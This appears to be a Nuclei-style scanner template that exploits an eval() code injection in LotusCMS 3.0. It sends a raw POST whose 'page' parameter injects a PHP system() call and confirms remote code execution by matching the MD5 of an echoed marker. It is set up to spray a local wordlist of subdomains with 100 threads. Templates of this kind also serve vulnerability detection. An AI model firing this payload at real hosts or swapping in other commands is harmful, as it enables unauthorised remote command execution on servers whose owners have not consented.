id: lotuscms-rce 2

info:
  name: LotusCMS 3.0 eval() RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit
  tags: lotuscms,rce

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /lcms/index.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/x-www-form-urlencoded
        
        page=index');${system('echo lotuscms_rce | md5sum')};#
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "38ee63071a04dc5e04ed22624c38e648"
        part: body

      - type: status
        status:
          - 200